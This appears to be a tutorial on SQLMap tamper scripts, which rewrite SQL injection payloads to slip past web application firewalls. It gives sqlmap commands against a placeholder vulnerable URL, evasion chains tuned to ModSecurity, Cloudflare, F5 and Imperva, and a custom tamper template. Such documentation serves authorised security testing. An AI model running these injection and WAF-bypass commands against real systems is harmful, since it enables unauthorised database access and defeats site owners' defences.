Tamper Scripts
Learn how to use SQLMap's tamper scripts to evade detection and bypass security controls
SQLMap's tamper scripts are powerful tools that modify SQL injection payloads to help evade detection by security mechanisms such as Web Application Firewalls (WAFs), Intrusion Detection Systems (IDS), and Intrusion Prevention Systems (IPS).
Understanding Tamper Scripts
Tamper scripts work by transforming the SQL injection payload before it's sent to the target. These transformations can include:
- Character encoding
- Case manipulation
- Whitespace modification
- Comment insertion
- Syntax alterations
- String concatenation
Using Tamper Scripts
Basic Usage
To use a single tamper script:
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between
This applies the between tamper script, which replaces greater than and less than operators with equivalent BETWEEN expressions.
Chaining Multiple Scripts
You can chain multiple tamper scripts, which will be applied in the specified order:
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between,space2comment,randomcase
This applies three tamper scripts in sequence:
between: Replaces operators with BETWEEN expressionsspace2comment: Replaces spaces with commentsrandomcase: Randomizes the case of SQL keywords
Common Tamper Scripts
Character Encoding Scripts
base64encode: Encodes all characters in Base64charencode: URL-encodes all characters in a payloadcharunicodeencode: Unicode-encodes charactershex2char: Replaces hexadecimal encoded characters with their actual character
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=charencode
Whitespace Manipulation Scripts
space2comment: Replaces spaces with commentsspace2dash: Replaces spaces with dashes followed by a commentspace2hash: Replaces spaces with hashes followed by a random string and a new linespace2plus: Replaces spaces with plus signsspace2randomblank: Replaces spaces with random whitespace characters
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=space2comment
Case Manipulation Scripts
randomcase: Randomizes the case of SQL keywordslowercase: Converts all uppercase characters to lowercaseuppercase: Converts all lowercase characters to uppercase
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=randomcase
Syntax Modification Scripts
between: Replaces greater than and less than operators with BETWEEN expressionsequaltolike: Replaces equal operators with LIKE operatorsgreatest: Replaces greater than operator with GREATEST functionifnull2ifisnull: Replaces IFNULL with IF(IS NULL)modsecurityversioned: Adds versioned MySQL comment
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=between,equaltolike
WAF-Specific Tamper Scripts
ModSecurity
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=modsecurityversioned,space2comment,space2hash,charunicodeencode,securesphere
Cloudflare
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=cloudflare
F5 BIG-IP ASM
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=charunicodeencode,space2randomblank,apostrophemask,randomcase
Imperva SecureSphere
sqlmap -u "http://www.example.com/vuln.php?id=1" --tamper=securesphere
Creating Custom Tamper Scripts
You can create custom tamper scripts to address specific evasion needs:
- Create a Python file in the SQLMap
tamperdirectory - Define a
tamperfunction that takes and returns a payload - Implement your transformation logic
Example custom tamper script (mytamper.py):
#!/usr/bin/env python
def tamper(payload, **kwargs):
"""
Description of your tamper script
"""
retVal = payload
if payload:
# Your transformation logic here
retVal = payload.replace("SELECT", "SEL/**/ECT")
return retVal
Troubleshooting Tamper Scripts
If you're having issues with tamper scripts:
- Use verbose mode (-v) to see the transformed payloads
- Try different combinations of tamper scripts
- Ensure the tamper scripts are compatible with your target DBMS
- Consider the order of tamper scripts, as it can affect the final payload
- Some tamper scripts may break the syntax for certain injection types